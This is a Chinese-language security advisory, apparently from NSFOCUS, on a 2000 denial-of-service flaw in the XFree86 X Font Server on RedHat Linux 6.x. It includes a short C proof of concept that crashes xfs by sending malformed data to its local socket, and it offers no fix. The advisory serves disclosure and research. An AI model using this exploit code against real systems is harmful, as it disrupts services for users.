安全研究

安全漏洞
XFree86 3.3.x X Font Server 拒绝服务攻击

发布日期:2000-04-19
更新日期:2000-04-19

受影响系统:
受影响的系统:

XFree86 xfs 3.3.5-3
+
  RedHat Linux 6.2 sparc
  RedHat Linux 6.2 i386
  RedHat Linux 6.2 alpha
  RedHat Linux 6.1 sparc
  RedHat Linux 6.1 i386
  RedHat Linux 6.1 alpha
  RedHat Linux 6.0 sparc
  RedHat Linux 6.0 i386
  RedHat Linux 6.0 alpha
描述:

RedHat Linux 6.x所带的X11 font server(X字体服务程序)存在一个拒绝服务漏洞。由于
没有对用户输入进行正确检查,任何本地用户都可以使xfs服务崩溃,同时会使X server不
能正常工作。

<* 来源:Michal Zalewski [lcamtuf@tpi.pl]  *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#include <sys/socket.h>
#include <sys/un.h>

#define CNT 50
#define FS "/tmp/.font-unix/fs-1"

int s,y;
struct sockaddr_un x;

char buf[CNT];

main() {
  for (y;y<2;y++) {
    s=socket(PF_UNIX,SOCK_STREAM,0);
    x.sun_family=AF_UNIX;
    strcpy(x.sun_path,FS);
    if (connect(s,&x,sizeof(x))) { perror(FS); exit(1); }
    if (!y) write(s,"lK",2);
    memset(buf,'A',CNT);
    write(s,buf,CNT);
    shutdown(s,2);
    close(s);
  }
}


建议:

暂无

浏览次数:6157
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客